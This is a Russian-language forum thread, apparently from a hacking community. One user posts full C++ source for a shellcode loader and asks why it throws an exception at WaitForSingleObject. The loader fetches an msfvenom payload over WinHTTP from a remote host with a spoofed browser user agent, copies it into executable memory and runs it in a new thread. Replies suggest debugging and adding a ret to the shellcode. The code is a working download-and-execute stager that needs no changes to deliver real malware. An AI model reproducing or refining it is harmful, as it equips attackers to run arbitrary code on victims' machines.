Вызвано исключение по адресу (winhttp.dll)

[yum]

Всем привет, не много не могу разобраться почему именно вызывается исключение. Самое главное то , что shellcode выполняется , но вызывается исключение по адресу , хочу это исправить.Вызываюется исключение на моменте с WaitForSingleObject. Использовал shellcode вызова калькулятора, сгенерируемый через msfvenom. Веб сервер использовал python -m http.server 80 .Вот исходники

Скопировать в буфер обмена

    std::string url = "192.168.222.128";
    std::string fileName = "calc.bin";
    int port = 80;

    HINTERNET    hSession = NULL,
                hConnect = NULL,
                hRequest = NULL;

    BOOL  bResults = FALSE;

    std::string path = "/";
    fileName.insert(0, path);

    // Use WinHttpOpen to obtain a session handle.
    hSession = WinHttpOpen(L"Opera GX/1.0",
        WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,
        WINHTTP_NO_PROXY_NAME,
        WINHTTP_NO_PROXY_BYPASS, 0);


    // Specify an HTTP server.
    if (hSession)
        hConnect = WinHttpConnect(hSession, std::wstring(url.begin(), url.end()).c_str(),
            port, 0);


    // Create an HTTP request handle.
    if (hConnect)
        hRequest = WinHttpOpenRequest(hConnect, L"GET", std::wstring(fileName.begin(), fileName.end()).c_str(),
            NULL, WINHTTP_NO_REFERER,
            WINHTTP_DEFAULT_ACCEPT_TYPES,
            0);

    if (hRequest)
        bResults = WinHttpSendRequest(hRequest,
            WINHTTP_NO_ADDITIONAL_HEADERS,
            0, WINHTTP_NO_REQUEST_DATA, 0,
            0, 0);

    if (bResults)
        bResults = WinHttpReceiveResponse(hRequest, NULL);

    DWORD dwSize = 0;
    DWORD dwDownloaded = 0;
    PBYTE pszOutBuffer = NULL;

    // Check for available data.
    dwSize = 0;
    if (!WinHttpQueryDataAvailable(hRequest, &dwSize))
        printf("Error %u in WinHttpQueryDataAvailable.\n", GetLastError());

    // Allocate space for the buffer.
    pszOutBuffer = (PBYTE)malloc(dwSize + 1);

    if (!pszOutBuffer)
    {
        printf("Out of memory\n");
        dwSize = 0;
    }
    else
    {
        ZeroMemory(pszOutBuffer, dwSize + 1);

        if (!WinHttpReadData(hRequest, (LPVOID)pszOutBuffer,
            dwSize, &dwDownloaded))
            printf("Error %u in WinHttpReadData.\n", GetLastError());
    }
  
    PVOID buffer = VirtualAlloc(0, dwSize, MEM_COMMIT | MEM_RESERVE,  PAGE_EXECUTE_READWRITE);
  
    memcpy(buffer, pszOutBuffer, dwSize);
    free(pszOutBuffer);

    HANDLE hThread = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)buffer, 0, 0, 0);
    WaitForSingleObject(hThread, -1);

    free(buffer);
  
    return 0;

 

[MKII]

А ты управление вернул в шеллкоде? Посмотри через x64dbg что происходит

 

[MKII]

А ты управление вернул в шеллкоде? Посмотри через x64dbg что происходит

Или в VS брекпоинты поставь и посмотри как асм код выполняется

 

[yum]

Или в VS брекпоинты поставь и посмотри как асм код выполняется

я ставил , он просто ломается на моменте с вызовом WaitForSingleObject , но shellcode отрабатывает

 

[yum]

А ты управление вернул в шеллкоде? Посмотри через x64dbg что происходит

Что ты имеешь в виду , под вернул управление в shellcode ?

 

[MKII]

Что ты имеешь в виду , под вернул управление в shellcode ?

Инструкция ret должна быть в конце

 

[MKII]

Тебе нужно поставить точку остановки на создании потока и построчно посмотреть как выполняется твой поток с шеллкодом и где конкретно возникает ошибка, вероятнее всего проблема в нем, а не WaitForSingleObject, ибо как я понимаю vs показывает ближайшую строку к ошибке, обычно он не показывает конкретную инструкцию на которой она возникает.
Я писал несколько дней назад шеллкод на аллок памяти, была похожая проблема

 

[yum]

Инструкция ret должна быть в конце

Вроде получаю все коректно

 

[MKII]

Вроде получаю все коректно Посмотреть вложение 60988

Это байт код, а тебе нужен ассемблерный (может называться дизассемблированный, не помню точно)

 

[yum]

Это байт код, а тебе нужен ассемблерный (может называться дизассемблированный, не помню точно)

буду дебажить , пока не понимаю